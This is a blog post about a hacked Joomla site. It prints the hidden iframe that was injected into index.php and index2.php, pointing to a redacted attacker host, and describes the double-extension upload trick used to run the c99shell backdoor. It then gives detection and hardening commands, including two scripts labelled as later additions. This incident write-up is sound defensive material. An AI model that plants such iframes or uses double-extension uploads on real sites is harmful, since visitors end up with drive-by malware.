Got hacked...
Wednesday, 20 June 2007 19:54
Everything started with an email.

Trojan-Downloader.VBS.Agent
From: Enrique MONTECRISTO [e-mail address hidden]
Sent: Mon 6/18/07 10:04 PM
To: [e-mail address hidden]

Hello Cedric,
When I browse your website with Firefox, I get this kind of warning from my GDATA antivirus shield:
http://www.gdata.de/trade/GB/productview/727/16
---------------------------
Virus: Trojan-Downloader.VBS.Agent.u
Address: stat1count.net
----------------------------
Virus: Trojan-Downloader.JS.Agent.fq
Address: stat1count.net
----------------------------
Is it a fake?

The "virus" Trojan-Downloader.JS.Agent pointed to malicious code inlined somewhere in my home page. Thanks to the Firefox Web Developer toolbar it was quite easy to locate (View all JavaScript).

The attacker had inserted two strange lines into my content: a hidden 1x1 pixel iframe appended to two files. He had tampered with:

index.php
// displays queries performed for page
if ($mosConfig_debug) {
    echo $database->_ticker . ' queries executed';
    echo '<pre>';
    foreach ($database->_log as $k=>$sql) {
        echo $k+1 . "\n" . $sql . '<hr />';
    }
    echo '</pre>';
}
doGzip();
?>

<iframe width='1' height='1' border='0' frameborder='0' src='http://xxxx.info/stds/go.php?sid=3'></iframe>

and /index2.php

<html xmlns="http://www.w3.org/1999/xhtml">
        <head>
            <?php echo $mainframe->getHead(); ?>
            <link rel="stylesheet" href="templates/<?php echo $cur_template;?>/css/template_css.css" type="text/css" />
            <link rel="shortcut icon" href="<?php echo $mosConfig_live_site; ?>/images/favicon.ico" />
            <meta http-equiv="Content-Type" content="text/html; <?php echo _ISO; ?>" />
            <meta name="robots" content="noindex, nofollow" />
            <?php if ($my->id || $mainframe->get( 'joomlaJavascript' )) { ?>
            <script language="JavaScript" src="<?php echo $mosConfig_live_site;?>/includes/js/joomla.javascript.js" type="text/javascript"></script>
            <?php } ?>
        </head>
        <body class="contentpane">
           <iframe width='1' height='1' border='0' frameborder='0' src='http://xxxxx.info/stds/go.php?sid=3'></iframe>
            <?php mosMainBody(); ?>
        </body>
    </html>
    <?php


At runtime the iframe target (go.php) redirected to
http://xxx.info/stds/pages/default.php
http://xxxxxxx.info/c/2380/counter21.php

(xxxxx.info: I don't want to give this attacker publicity by publishing his server URL here.)

How to find all places potentially infected?

The following command returns a list of all files, with their path (-H), that contain the substring xxxxx (the attacker's domain):

# find . -type f  -exec grep -H xxxxx {} \;

How did I get infected?

It seems the attacker used my demo site at demo.waltercedric.com to upload an image, or to replace an existing one that had overly permissive rights. It may have been a file like runme.php.jpg: with the common Apache configuration "AddHandler application/x-httpd-php .php", mod_mime applies the handler to any of a file's extensions, so such an "image" is executed as PHP. The script then bootstraps and loads a hacker tool, c99shell (also known as PHP/C99Shell.A or Backdoor.PHP.C99Shell.c).

PHP/C99Shell-A is a backdoor Trojan for platforms with PHP support, such as web servers. It executes the commands it receives from a remote user.
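The grep one-liner above finds one known attacker domain; the script below, an added example that is not code from the original post, generalises it to the two kinds of artifact this post describes: injected hidden iframes or obfuscated loaders in text files, and double-extension uploads such as runme.php.jpg, plus stray .php files in the upload directories. The pattern list, the function names and the images/media directory names are assumptions for a Joomla 1.0 layout; adjust them to your site.

```shell
#!/bin/sh
# Added example (not code from the original post): scan a web root for
# (1) injected hidden iframes / obfuscated loaders in text files and
# (2) "double extension" uploads such as runme.php.jpg that Apache's
# AddHandler still hands to PHP.  The pattern list is an assumption; it
# matches the generic shape of such injections, not one attacker's domain.

# Extended regexes, one per line, that rarely occur in legitimate Joomla files.
INJECT_PATTERNS='<iframe[^>]*(width|height)=.?[01].?[^>]*src=.?https?://
eval\(base64_decode\(
eval\(gzinflate\(
document\.write\(unescape\('

# Print, one path per line, every text file under $1 that matches any pattern.
find_injected() {
    printf '%s\n' "$INJECT_PATTERNS" | while IFS= read -r pat; do
        [ -n "$pat" ] || continue
        # grep exits 1 when nothing matches; that is not an error here.
        grep -rIlE -e "$pat" "$1" 2>/dev/null || true
    done | sort -u
}

# Print every file under $1 whose name carries a second extension after
# ".php" (runme.php.jpg, shell.php.bak, ...).
find_double_ext() {
    find "$1" -type f -name '*.php.*' -print
}

# Print .php files inside the upload directories, which should hold only
# images.  The directory list is an assumption for a Joomla 1.0 layout.
find_php_in_uploads() {
    for d in images media; do
        if [ -d "$1/$d" ]; then
            find "$1/$d" -type f -name '*.php' -print
        fi
    done
}

# Usage: sh scan_webroot.sh /var/www/html
if [ "$#" -ge 1 ]; then
    echo "== possible injected loaders under $1"; find_injected "$1"
    echo "== double-extension files under $1";    find_double_ext "$1"
    echo "== PHP scripts in upload directories";  find_php_in_uploads "$1"
fi
```

Run it from cron and diff the output against the previous run: a new path in any of the three lists is what you want to be paged for, and the first list is the one that would have caught the iframe on this site.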

How to avoid that next time

No file in the Apache document root should have more than r--r--r-- rights, so here is a small command that you can put in a crontab or save for a periodic check. It changes every file that is not already read-only to read-only for user, group and other:

# find . -type f ! -perm 444 -exec chmod a=r {} \;

Be careful with what Joomla! itself writes to (the cache, uploaded images, configuration.php when the global configuration is saved): those need to stay writable by the web server user, so exclude them or the site will stop working.

Joomla! automates the CHMOD when it saves a file, but not for every file in the tree.

Avoid any setuid or setgid file in your Apache root; list them with:
# find . -type f \( -perm -4000 -o -perm -2000 \) -print
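The two find commands above are the audit side; the script below, an added example rather than the post's own one-liner, turns them into the complete policy: strip setuid/setgid bits, make every file r--r--r-- and every directory r-xr-xr-x, then re-open only an explicit allow-list of directories for their owner. The allow-list (cache, images, media, administrator/backups), the 644/755 modes used for it and the function names are assumptions for a Joomla 1.0 layout; adjust them to your install.

```shell
#!/bin/sh
# Added example, not the original post's one-liner.  Audits and hardens the
# permissions of a web root the way the post recommends: every file r--r--r--,
# every directory r-xr-xr-x, no setuid/setgid bits, plus an explicit allow-list
# of directories Joomla must still write to.  The allow-list and the 644/755
# modes used for it are assumptions for a Joomla 1.0 layout; adjust to your site.

# Directories (relative to the web root) the web server user must write to.  Assumed.
WRITABLE_DIRS="cache images media administrator/backups"

# Print every file or directory under $1 that is world-writable (o+w).
find_world_writable() {
    find "$1" -perm -002 -print
}

# Print every setuid or setgid file under $1; a web root should contain none.
find_setid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print
}

# Apply the policy to web root $1.
harden_webroot() {
    root=$1
    # 1. Nothing in a web root needs setuid/setgid: strip the bits first.
    find "$root" -type f \( -perm -4000 -o -perm -2000 \) -exec chmod u-s,g-s {} \;
    # 2. Everything read-only: files 444, directories 555 (x is needed to traverse).
    find "$root" -type f ! -perm 444 -exec chmod 444 {} \;
    find "$root" -type d ! -perm 555 -exec chmod 555 {} \;
    # 3. Re-open only the allow-listed directories, and only for their owner
    #    (the web server user), never for group or other.
    for d in $WRITABLE_DIRS; do
        [ -d "$root/$d" ] || continue
        find "$root/$d" -type d -exec chmod 755 {} \;
        find "$root/$d" -type f -exec chmod 644 {} \;
    done
}

# Usage: sh harden_webroot.sh /var/www/html   (audit, harden, re-audit)
if [ "$#" -ge 1 ]; then
    echo "== world-writable before:"; find_world_writable "$1"
    echo "== setuid/setgid before:";  find_setid "$1"
    harden_webroot "$1"
    echo "== world-writable after:";  find_world_writable "$1"
fi
```

Run the two audit functions alone from cron first; once their output is empty and stays empty, the harden step can follow them in the same job. Anything that shows up as world-writable or setuid after that is a change somebody else made to the tree.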

Note:


Comments
Anonymous (85.108.52.xxx) 2008-06-09 15:19:09

SILLY